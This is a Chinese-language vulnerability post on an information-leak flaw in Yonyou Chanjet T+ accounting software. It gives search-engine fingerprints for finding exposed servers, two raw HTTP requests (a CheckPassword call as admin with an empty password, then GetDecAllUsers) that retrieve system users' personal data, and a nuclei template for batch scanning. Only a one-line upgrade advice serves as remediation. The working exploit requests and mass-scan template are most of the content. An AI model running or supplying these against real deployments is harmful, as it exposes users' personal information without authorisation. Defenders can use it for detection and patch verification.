(附nuclei 批量验证文件)用友 畅捷通T+ getdecallusers 信息泄露漏洞
声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
1、漏洞简介
用友 畅捷通T+ getdecallusers 存在信息泄露漏洞,可获取系统用户个人信息。
2、资产指纹
fofa:app=“畅捷通-TPlus”
hunter: app.name=“畅捷通 T+”
3、漏洞复现
发送以下请求。
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Host: {{Hostname}}
User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00
Content-Length: 278
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
{"AccountNum": "000", "UserName": "admin", "Password": "", "rdpYear": "2023", "rdpMonth": "5", "rdpDate": "17", "webServiceProcessID": "admin", "ali_csessionid": "", "ali_sig": "", "ali_token": "", "ali_scene": "", "role": "", "aqdKey": "", "fromWhere": "browser", "cardNo": ""}
再发送以下请求
POST /tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers HTTP/1.1
Host: {{Hostname}}
User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00
Content-Length: 54
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Cookie: ASP.NET_SessionId=nlmsnrfged2dwu25dpn0xgni
{"condition": "", "accNum": "", "onlyBuying": "false"}
4、nuclei yaml文件
id: chanjet-getdecallusers-infoleak
info:
name: 用友-畅捷通T+-Ufida-信息泄露
author: XXX
severity: high
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Host: {{Hostname}}
User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 278
Content-Type: application/json
{"AccountNum": "000", "UserName": "admin", "Password": "", "rdpYear": "2023", "rdpMonth": "5", "rdpDate": "17", "webServiceProcessID": "admin", "ali_csessionid": "", "ali_sig": "", "ali_token": "", "ali_scene": "", "role": "", "aqdKey": "", "fromWhere": "browser", "cardNo": ""}
- |
POST /tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers HTTP/1.1
Host: {{Hostname}}
User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 54
Content-Type: application/json
{"condition": "", "accNum": "", "onlyBuying": "false"}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains((body_1), 'error')"
- "status_code_2 == 200 && contains((body_2), 'UserId')"
condition: and
修复方式
关注用友官网,及时升级至最新版本。